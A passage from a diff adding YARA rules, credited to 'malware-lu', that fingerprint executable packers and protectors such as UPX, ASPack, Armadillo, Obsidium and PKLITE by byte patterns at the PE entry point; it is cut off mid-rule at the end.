+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? 50 06 56 1E 33 C0 50 1F C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBySV028DLLshoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C2 FF E0 ?? ?? ?? ?? 60 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncrypt10JunkCode
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C BE 00 10 40 00 8B FE B9 ?? ?? ?? ?? BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 E9 ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPasswordv02SMTSMF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 ?? ?? ?? 8B EC 5D C3 33 C0 5D 8B FD 81 ED 33 26 40 ?? 81 EF ?? ?? ?? ?? 83 EF 05 89 AD 88 27 40 ?? 8D 9D 07 29 40 ?? 8D B5 62 28 40 ?? 46 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE22006710220061025WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 D0 68 ?? ?? ?? ?? FF D2 }
+	$a1 = { 33 D0 68 ?? ?? ?? ?? FF D2 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEPaCKv10CCopyright1998byANAKiN
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 2D 3D FE 20 50 45 2D 50 41 43 4B 20 76 31 2E 30 20 2D FE 2D 20 28 43 29 20 43 6F 70 }
+
+condition:
+		$a0
+}
+	
+	
+rule YodasProtectorv1032Beta2AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxMTEnonencrypted
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D9 80 E1 FE 75 02 49 49 97 A3 ?? ?? 03 C1 24 FE 75 02 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01FSG131Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv212AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }
+	$a1 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Upack022023betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 }
+	$a1 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 59 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 }
+	$a2 = { AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 ?? 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 }
+
+condition:
+		$a0 or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01CodeLockAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv100c1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E 8C 1E ?? ?? 8B 1E ?? ?? 8C DA 81 C2 ?? ?? 3B DA 72 ?? 81 EB ?? ?? 83 EB ?? FA 8E D3 BC ?? ?? FB FD BE ?? ?? 8B FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakenSPack13emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv100c2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? A1 ?? ?? 2D ?? ?? 8C CB 81 C3 ?? ?? 3B C3 77 ?? 05 ?? ?? 3B C3 77 ?? B4 09 BA ?? ?? CD 21 CD 20 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchyv017FGiesen
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC FF 4D 08 31 D2 8D 7D 30 BE }
+
+condition:
+		$a0
+}
+	
+	
+rule ACProtectv190gRiscosoftwareInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 0F 87 02 00 00 00 1B F8 E8 01 00 00 00 73 83 04 24 06 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX293300LZMAMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium133720070623ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv2000AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 70 05 00 00 EB 4C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov4000053SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 20 8B 4B 00 68 80 E4 48 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4B 00 33 D2 8A D4 89 15 A4 A1 4B 00 8B C8 81 E1 FF 00 00 00 89 0D A0 A1 4B 00 C1 E1 08 03 CA 89 0D 9C A1 4B 00 C1 E8 10 A3 98 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov160a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 71 40 00 68 48 2D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectUltraProtect10X20XRiSco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 6F 72 74 5F 45 6E 64 73 73 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Thinstall3035Jtit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 }
+	$a1 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 C3 B9 08 00 00 00 E8 01 00 00 00 C3 33 C0 E8 E1 FF FF FF 13 C0 E2 F7 C3 33 C9 41 E8 D4 FF FF FF 13 C9 E8 CD FF FF FF 72 F2 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PENinjav10DzAkRAkerTNT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 5B 2A 40 00 BF 35 12 00 00 E8 40 12 00 00 3D 22 83 A3 C6 0F 85 67 0F 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded19XJitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 ?? ?? ?? ?? 50 E8 87 FC FF FF 59 59 A1 ?? ?? ?? ?? 8B 40 10 03 05 ?? ?? ?? ?? 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorv13045
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 }
+	$a1 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Obsidium1338ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPV073betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E 72 6C 70 00 00 00 00 00 50 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 E0 }
+
+condition:
+		$a0
+}
+	
+	
+rule yCv13byAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC C0 00 00 00 53 56 57 8D BD 40 FF FF FF B9 30 00 00 00 B8 CC CC CC CC F3 AB 60 E8 00 00 00 00 5D 81 ED 84 52 41 00 B9 75 5E 41 00 81 E9 DE 52 41 00 8B D5 81 C2 DE 52 41 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
+
+condition:
+		$a0
+}
+	
+	
+rule PCPECalphapreview
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AlexProtectorv10Alex
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 9C FC BE ?? ?? BF ?? ?? 57 B9 ?? ?? F3 A4 8B ?? ?? ?? BE ?? ?? BF ?? ?? F3 A4 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHPack01FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 54 ?? ?? 00 B8 48 ?? ?? 00 FF 10 68 B3 ?? ?? 00 50 B8 44 ?? ?? 00 FF 10 68 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SentinelSuperProAutomaticProtectionv640Safenet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 6A 01 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C9 3D B7 00 00 00 A1 ?? ?? ?? ?? 0F 94 C1 85 C0 89 0D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DxPack10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 8B FD 81 ED ?? ?? ?? ?? 2B B9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah103byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 2A 27 40 00 31 C0 40 83 F0 06 40 3D 40 1F 00 00 75 07 BE 6A 27 40 00 EB 02 EB EB 8B 85 9E 28 40 00 83 F8 01 75 17 31 C0 01 EE 3D 99 00 00 00 74 0C 8B 8D 86 28 40 00 30 0E 40 46 EB ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1258ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nPackv11150200BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? 00 E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PerlApp602ActiveState
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 2C EA 40 00 FF D3 83 C4 0C 85 C0 0F 85 CD 00 00 00 6A 09 57 68 20 EA 40 00 FF D3 83 C4 0C 85 C0 75 12 8D 47 09 50 FF 15 1C D1 40 00 59 A3 B8 07 41 00 EB 55 6A 08 57 68 14 EA 40 00 FF D3 83 C4 0C 85 C0 75 11 8D 47 08 50 FF 15 1C D1 40 00 59 89 44 24 10 EB 33 6A 09 57 68 08 EA 40 00 FF D3 83 C4 0C 85 C0 74 22 6A 08 57 68 FC E9 40 00 FF D3 83 C4 0C 85 C0 74 11 6A 0B 57 68 F0 E9 40 00 FF D3 83 C4 0C 85 C0 75 55 }
+	$a1 = { 68 9C E1 40 00 FF 15 A4 D0 40 00 85 C0 59 74 0F 50 FF 15 1C D1 40 00 85 C0 59 89 45 FC 75 62 6A 00 8D 45 F8 FF 75 0C F6 45 14 01 50 8D 45 14 50 E8 9B 01 00 00 83 C4 10 85 C0 0F 84 E9 00 00 00 8B 45 F8 83 C0 14 50 FF D6 85 C0 59 89 45 FC 75 0E FF 75 14 FF 15 78 D0 40 00 E9 C9 00 00 00 68 8C E1 40 00 FF 75 14 50 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule UPXProtectorv10x2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallEmbedded2501Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A8 1A 00 00 B9 6D 1A 00 00 BA 21 1B 00 00 BE 00 10 00 00 BF C0 53 00 00 BD F0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CodeVirtualizer1310OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C FC E8 00 00 00 00 5F 81 EF ?? ?? ?? ?? 8B C7 81 C7 ?? ?? ?? ?? 3B 47 2C 75 02 EB 2E 89 47 2C B9 A7 00 00 00 EB 05 01 44 8F ?? 49 0B C9 75 F7 83 7F 40 00 74 15 8B 77 40 03 F0 EB 09 8B 1E 03 D8 01 03 83 C6 04 83 3E 00 75 F2 8B 74 24 24 8B DE 03 F0 B9 01 00 00 00 33 C0 F0 0F B1 4F 30 75 F7 AC }
+
+condition:
+		$a0
+}
+	
+	
+rule VProtector13Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 60 8B B4 24 24 00 00 00 8B BC 24 28 00 00 00 FC C6 C2 80 33 DB A4 C6 C3 02 E8 A9 00 00 00 0F 83 F1 FF FF FF 33 C9 E8 9C 00 00 00 0F 83 2D 00 00 00 33 C0 E8 8F 00 00 00 0F 83 37 00 00 00 C6 C3 02 41 C6 C0 10 E8 7D 00 00 00 10 C0 0F 83 F3 FF FF FF }
+	$a1 = { E9 B9 16 00 00 55 8B EC 81 EC 74 04 00 00 57 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 FF FF C2 10 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 00 00 C2 14 68 FF FF 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 68 ?? ?? ?? ?? 9C 81 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9D 54 FF 14 24 68 00 00 00 00 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Packman0001bubba
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 8D A8 ?? FE FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePackV11XV12XMethod1bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA BD ?? ?? ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEEncryptv40bJunkCode
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 ?? ?? 00 66 83 ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEQuake006forgat
+{
+      meta:
+		author="malware-lu"
+strings:
